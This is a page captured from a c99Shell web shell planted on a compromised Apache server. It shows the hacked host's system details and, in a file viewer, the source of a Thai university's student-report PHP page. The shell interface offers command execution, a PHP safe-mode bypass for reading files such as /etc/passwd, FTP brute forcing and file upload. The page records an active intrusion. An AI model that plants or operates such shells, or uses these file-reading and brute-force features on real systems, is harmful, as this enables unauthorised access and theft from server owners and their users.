!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/report/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     rep03.php (4.99 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php   
include_once("classes/Crud.php");
$crud = new Crud();
?>
<!DOCTYPE HTML>
<html>
<head>  
<meta charset="UTF-8">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
<link rel="stylesheet"
          href="https://fonts.googleapis.com/css?family=Tangerine">
    <style>
      body {
        font-family: 'Kanit', sans-serif;
        font-size: 8 px;
      }
    </style>
<link rel="stylesheet" type="text/css" href="app-assets/vendors/css/tables/datatable/datatables.min.css">
</head>
<body>
<?php
include("header.php");
?>
<br>
<center>จำนวนนักศึกษาใหม่ จำแนกตามปีการศึกษาของแต่ละหลักสูตรที่เปิดสอน</center>
<br>
<div class="row">
  <div class="col-sm-12 text-center">
    <div class="card">
      <div class="card-body">
      <div id="chartContainer" style="height: 370px; width: 100%;"></div>
      </div>
    </div>
  </div>
  
</div>

<div class="row">
  <div class="col-sm-12 text-center">
    <div class="card">
      <div class="card-body">
<table class="table table-bordered">
  <thead>
    <tr>
      <th>ปีการศึกษา</th>
      <th>จำนวนนักศึกษาใหม่(คน)</th>
      <th>ชื่อหลักสูตร</th>
      <th>รายละเอียด</th>
    </tr>
  </thead>
  <tbody>
  <?php
    $no
=1;
    
$a1=0;
    
$student"SELECT * FROM student_recipe ORDER BY app_year DESC ";
    
$resultstudent $crud->getData($student);
    foreach(
$resultstudent as $key => $datastudent){
  
?>
    <tr>
      <td><?=$datastudent['app_year']?></td>
      <td><?=$datastudent['total']?></td>
      <td><?=$datastudent['curName']?></td>
      <td><a href="detailStudentre.php?studentYear=<?=$datastudent['app_year']?>&curId=<?=$datastudent['curId']?>&curName=<?=$datastudent['curName']?>" target="new">รายละเอียด</a></td>
    </tr>
    <?php
    
}
    
?>
  </tbody>
</table>
</div>
    </div>
  </div>
  
</div>
    <script src="app-assets/vendors/js/tables/datatable/datatables.min.js"></script>
    <script src="app-assets/vendors/js/tables/datatable/datatables.buttons.min.js"></script>
    <script src="app-assets/vendors/js/tables/datatable/datatables.bootstrap4.min.js"></script>
    <script src="app-assets/js/scripts/datatables/datatable.js"></script>
    <script src="canvasjs.min.js"></script>
</body>
</html>
<?php
function DateThai($strDate)
{
    
$strYear date("Y",strtotime($strDate))+543;
    
$strMonthdate("n",strtotime($strDate));
    
$strDaydate("j",strtotime($strDate));
    
$strHourdate("H",strtotime($strDate));
    
$strMinutedate("i",strtotime($strDate));
    
$strSecondsdate("s",strtotime($strDate));
    
$strMonthCut = Array("","ม.ค.","ก.พ.","มี.ค.","เม.ย.","พ.ค.","มิ.ย.","ก.ค.","ส.ค.","ก.ย.","ต.ค.","พ.ย.","ธ.ค.");
    
$strMonthThai=$strMonthCut[$strMonth];
    return 
"$strDay $strMonthThai $strYear";
}
?>


<script>
window.onload = function () {

var chart = new CanvasJS.Chart("chartContainer", {
    exportEnabled: true,
    animationEnabled: true,
    title:{
        text: "รายงานการเปรียบเทียบนักศึกษาแรกเข้า/สำเร็จการศึกษา ในแต่ละปีการศึกษา"
    }, 
    axisX: {
        title: "ปีการศึกษา"
    },
    axisY: {
        title: "จำนวนคน",
        includeZero: true
    },
    toolTip: {
        shared: true
    },
    data: [{
        type: "column",
        name: "นักศึกษาแรกเข้า",
        showInLegend: true,      
        yValueFormatString: "#,##0.# คน",
        dataPoints: [
            { label: <?=$yeara?>,  y: <?=$totald1?> },
            { label: <?=$yearb?>, y: <?=$totald2?> },
            { label: <?=$yearc?>, y: <?=$totald3?> },
            { label: <?=$yeard?>,  y: <?=$totald4?> },
            { label: <?=$yeare?>,  y: <?=$totald5?> },
            { label: <?=$yearf?>,  y: <?=$totald6?> },
            { label: <?=$yearg?>,  y: <?=$totald7?> },
            { label: <?=$yeari?>,  y: <?=$totald8?> },
            { label: <?=$yearj?>,  y: <?=$totald9?> },
            { label: <?=$yearh?>,  y: <?=$totald10?> }
        ]
    },
    {
        type: "column",
        name: "สำเร็จการศึกษา",
        
        showInLegend: true,
        yValueFormatString: "#,##0.# คน",
        dataPoints: [
            { label: <?=$yeara?>, y: <?=$totale1?> },
            { label: <?=$yearb?>, y: <?=$totale2?> },
            { label: <?=$yearc?>, y: <?=$totale3?> },
            { label: <?=$yeard?>, y: <?=$totale4?> },
            { label: <?=$yeare?>, y: <?=$totale5?> },
            { label: <?=$yearf?>, y: <?=$totale6?> },
            { label: <?=$yearg?>, y: <?=$totale7?> },
            { label: <?=$yearh?>, y: <?=$totale8?> },
            { label: <?=$yeari?>, y: <?=$totale9?> },
            { label: <?=$yearj?>, y: <?=$totale10?> }
        ]
    }]
});
chart.render();

function toggleDataSeries(e) {
    if (typeof (e.dataSeries.visible) === "undefined" || e.dataSeries.visible) {
        e.dataSeries.visible = false;
    } else {
        e.dataSeries.visible = true;
    }
    e.chart.render();
}

}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.011 ]--